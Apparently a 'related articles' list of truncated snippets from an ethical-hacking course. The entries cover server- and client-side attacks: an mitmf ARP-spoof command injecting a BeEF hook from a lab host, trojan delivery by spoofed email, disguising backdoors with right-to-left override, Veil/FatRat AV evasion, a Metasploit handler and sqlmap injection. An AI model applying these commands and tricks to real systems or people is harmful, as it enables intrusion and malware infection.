More articles related to [Ethical Hacking - GAINING ACCESS(9)]

Gaining Access Introduction. Everything is a computer. Two main approaches: (1) Server side: does not require user interaction; all we need is a target IP. Start with information gathering, find open ports, OS, installed services, and work from there. (2) Cl…
CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and execute the following commands: python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000…
Server Side Attack Analysing scan results and exploiting the target system. Go to the Analysis page and find the target host. Scan result - services: Scan result - Vulnerabilities: Scan result - credentials: Try to log in to the database using the above cr…
CLIENT SIDE ATTACKS - Detecting Trojans manually or using a sandbox Analyzing trojans Check the properties of the file. The file type of a trojan is application (.exe), even if it looks like a jpg, PDF or other file. Is it what it seems to be? Check Net…
CLIENT SIDE ATTACKS - BeEf Framework Browser Exploitation Framework allowing us to launch a number of attacks on a hooked target. Targets are hooked once they load a hook URL. DNS spoof requests to a page containing the hook. Inject the hook in brows…
CLIENT SIDE ATTACKS - Trojan delivery method - using email spoofing Use gathered info to contact targets (e.g. Maltego, Google, etc.). Send an email pretending to be a friend. Online Tool: https://anonymousemail.me/ Ask them to open a link, downl…
CLIENT SIDE ATTACKS - Spoofing backdoor extension Change the extension of the trojan from exe to a suitable one. Make the trojan even more trustworthy. We will use an old trick using the "right-to-left override" character. 1. Open up the character…
Client-Side Attacks - Social Engineering Tool: The FAT RAT Just like Veil, it generates Undetectable Metasploit backdoors. Uses a different method to evade AV programs. Generates executable binary backdoors for: Windows Mac OS Linux Android Install a…
CLIENT SIDE ATTACKS Backdooring ANY file Combine backdoor with any file - Generic solution. Users are more likely to run a pdf, image or audio file than an executable. Works well with social engineering. To convert the original(pdf, jpg, mp3) file to…
CLIENT SIDE ATTACKS - Backdooring exe's Download an executable file first. VEIL - FRAMEWORK A backdoor is a file that gives us full control over the machine it gets executed on. Backdoors can be caught by Anti-Virus programs. Veil is a framewor…
CLIENT SIDE ATTACKS - Social Engineering Social Engineering Information gathering Tool: Maltego Gathering Information About Target's Facebook Account, Twitter Account(Friends, Followers...), Email, Phone Number, etc.…
CLIENT SIDE ATTACKS Social Engineering Gather info about the user(s). Build a strategy based on the info. Build a backdoor based on the info.…
CLIENT SIDE ATTACKS Protecting against smart delivery methods Ensure you're not being MITM'ed -> use trusted networks, xarp. Only download from HTTPS pages. Check file MD5 after download.  http://www.winmd5.com/…
CLIENT SIDE ATTACKS Backdoor delivery method2 - backdooring exe downloads Backdoor any exe the target downloads. We need to be in the middle of the connection. Install bdfproxy following the guide on the website - https://packages.debian.org/sid/all/…
CLIENT SIDE ATTACKS - Listening for connections 1. Run Metasploit Move the backdoor file to the webserver folder. And download it on the target machine. msfconsole 2. Use the handler module. use exploit/multi/handler 3. Set payload. set PAYLOAD[veil…
CLIENT SIDE ATTACKS Use if server-side attacks fail. If IP is probably useless. Require user interaction. Social engineering can be very useful. Information gathering is vital. Generating an undetectable backdoor using VEIL-EVASION https://github.com…
Server Side Attack Nexpose - Analysing Scan Results and Generating Reports OS and Software Information. Services Information HTTP Service Detailed Information. Vulnerability Information Vulnerabilities list: Detailed Vulnerability Information - Affect…
Server Side Attacks NeXpose - configure and launch a scan Configure and initialize the application. Browse https://localhost:3780 and activate the system. Create a site and configure the settings. Info & security Assets: Authentication (not a must) Template…
Server Side Attacks - NEXPOSE NeXpose is a vulnerability management framework, it allows us to discover, assess and act on discovered vulnerabilities, it also tells us a lot of info about the discovered vulnerabilities, whether they are exploitable a…
Server Side Attack Install Metasploit Community/Pro and activate it. Create a new project for the target - the Metasploitable machine - and start the scan. Start the scan task. You can modify the advanced settings, but it is not a must. Launch the scan and wait…
SERVER SIDE ATTACKS - METASPLOIT Metasploit is an exploit development and execution tool. It can also be used to carry out other penetration testing tasks such as port scans, service identification and post exploitation tasks. > msfconsole - runs the…
Server side attacks - code execution Let's analyze the Zenmap scan result first and search for vulnerabilities in Samba smbd 3.x. We find the following vulnerability and try to use it.  https://www.rapid7.com/db/modules/exploit/multi/samba/…
Server Side Attacks - INFORMATION GATHERING Need an IP address. Very simple if the target is on the same network (netdiscover or zenmap). If the target has a domain, then a simple ping will return its IP. > ping www.XXXX.com Getting the IP is trickier if the…
What is Hacking? Gaining unauthorized access. Hackers? 1. Black-hat Hackers 2. White-hat Hackers 3. Grey-hat Hackers WHAT IS A PROGRAM? A set of instructions to do a certain task or solve a problem.…
Hacking is gaining unauthorized access to anything. Preparation Setting up a lab and installing needed applications and operating systems. Basics about computers and Linux systems. Network Pentesting Test the security of networks and computers connect…
INFORMATION GATHERING IP address. Domain name Info. Technologies used. Other websites on the same server. DNS records. Unlisted files, sub-domains, directories. 1. Whois Lookup - Find info about the owner of the target. () -> http://whois.domaintools…
Gaining Access to encrypted networks Three main encryption types: 1. WEP 2. WPA 3. WPA2 WEP Cracking WEP is old encryption, but it is still used in some networks, therefore we will explain how to break it. It uses an algorithm called RC4 where each pac…
Pre-Connection Attacks - attacks that can be done before connecting to the network. Gaining Access - How to break Wi-Fi keys (WEP/WPA/WPA2). Post-Connection Attacks - can be done after connecting to the network. Detection & Security - detect and prevent the above a…
Ethical Hacking Tutorials Free Ethical Hacking Tutorials https://www.guru99.com/ethical-hacking-tutorials.html Types of Hackers Ethical Hacker (White hat) Cracker (Black hat) Grey hat Script kiddies Hacktivist Phreaker https://www.guru99.com/what-is-…
SQL INJECTION SQLMAP Tool designed to exploit SQL injections. Works with many DB types, MySQL, MSSQL ...etc. >sqlmap --help >sqlmap -u [target URL] Following are examples: sqlmap -u "http://10.0.0.24/mutillidae/index.php?page=user-info.php&…